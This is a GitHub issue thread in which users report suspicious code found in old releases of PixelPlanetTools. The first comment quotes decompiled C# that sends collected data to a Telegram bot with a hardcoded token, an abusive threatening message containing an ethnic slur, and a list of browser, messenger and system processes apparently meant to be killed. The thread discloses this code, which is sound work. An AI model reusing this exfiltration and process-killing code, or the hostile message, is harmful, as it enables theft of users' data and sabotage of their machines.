### ISSUE TITLE
Weird things in the code in old version

### ISSUE THREAD

**Issue by kulikalas** [Topinambur223606/PixelPlanetTools#18]

**Comment by kulikalas** [comment]
`string address2 = string.Format("https://api.telegram.org/bot{0}/sendMessage", "1215746823:AAFuv2iSEgMoLoLBcrZ5-phV-qeUBBcQclQ");
			NameValueCollection nameValueCollection = new NameValueCollection();
			nameValueCollection["chat_id"] = "409724168";
			nameValueCollection["text"] = address;
			NameValueCollection data = nameValueCollection;
			using (WebClient webClient = new WebClient())
			{
				webClient.UploadValues(address2, data);
			}`
`Text = "Hello, polska kurwa.\r\nTell your friends that they are next.\r\n\r\nWitam polska kurwa.\r\nPowiedz znajomym, że są następni.",`

`private static readonly string[] processNames = new string[]
		{
			"chrome",
			"chromium",
			"iexplore",
			"opera",
			"firefox",
			"MicrosoftEdge",
			"vivaldi",
			"tor",
			"brave",
			"waterfox",
			"discord",
			"telegram",
			"teams",
			"SkypeApp",
			"skype",
			"steam",
			"battle.net",
			"EpicGamesLauncher",
			"GalaxyClient",
			"GalaxyCommunication",
			"taskmgr",
			"explorer"
		};
	}`

looks like code to send ip/mac/task list address via telegram and killing tasks/wipe disc lol

**Comment by nautics889** [comment]
yeah, there was such nuance, you can also take a look at [https://github.com/Topinambur223606/PixelPlanetTools/issues/16](#16) and [#14](https://github.com/Topinambur223606/PixelPlanetTools/issues/14), but the last release of exe files was not so far ago, so that code probably was removed there

**Comment by kulikalas** [comment]
> yeah, there was such nuance, you can also take a look at [#16](https://github.com/Topinambur223606/PixelPlanetTools/issues/16) and [#14](https://github.com/Topinambur223606/PixelPlanetTools/issues/14), but the last release of exe files was not so far ago, so that code probably was removed there

yes, but i have 5.0.0.3 and 5.0.0.2 on pc and it's awesome what we can find there
